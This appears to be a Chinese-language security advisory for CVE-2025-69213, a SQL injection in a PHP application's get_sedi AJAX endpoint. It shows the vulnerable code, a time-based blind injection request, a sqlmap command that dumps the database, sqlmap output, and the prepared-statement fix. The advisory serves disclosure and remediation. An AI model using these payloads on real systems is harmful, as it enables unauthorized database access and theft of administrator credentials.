| 字段 | 详情 |
|---|---|
| CVE ID | CVE-2025-69213 |
| 严重性 | 高危 |
| 安全公告 | 查看安全公告 |
| 发现者 | Lukasz Rybak |
ajax_complete.php 端点在处理 get_sedi 操作时存在 SQL 注入漏洞。已认证的攻击者可通过 idanagrafica 参数注入恶意 SQL 代码,导致未授权访问数据库。
文件: modules/anagrafiche/ajax/complete.php:28
case 'get_sedi':
$idanagrafica = get('idanagrafica');
$q = "SELECT id, CONCAT_WS( ' - ', nomesede, citta ) AS descrizione
FROM an_sedi
WHERE idanagrafica='".$idanagrafica."' ...";
$rs = $dbo->fetchArray($q);
$_GET['idanagrafica'] → get('idanagrafica')$dbo->fetchArray($q) 执行恶意查询手动 PoC(基于时间的盲注 SQLi):
GET /ajax_complete.php?op=get_sedi&idanagrafica=1' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1 HTTP/1.1
Host: localhost:8081
Cookie: PHPSESSID=<valid-session>
SQLMap 利用:
sqlmap -u "http://localhost:8081/ajax_complete.php?op=get_sedi&idanagrafica=1*" \
--cookie="PHPSESSID=<session>" \
--dbms=MySQL \
--technique=T \
--level=3 \
--dump
SQLMap 输出:
[INFO] URI parameter '#1*' appears to be 'MySQL >= 5.0.12 AND time-based blind (query SLEEP)' injectable
Parameter: #1* (URI)
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: idanagrafica=1' AND (SELECT 2572 FROM (SELECT(SLEEP(5)))oOnc)-- rhVF
back-end DBMS: MySQL >= 5.0.12
zz_users 表以获得管理员访问权限SELECT ... INTO OUTFILE 实现使用预处理语句替代直接拼接:
修复前:
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica='".$idanagrafica."' ...";
修复后:
$idanagrafica = get('idanagrafica');
$q = "SELECT ... WHERE idanagrafica=".prepare($idanagrafica)." ...";
发现者:Łukasz Rybak
此 CVE 已遵循协调漏洞披露规范进行负责任地披露。此处提供的信息仅供教育和防御目的使用。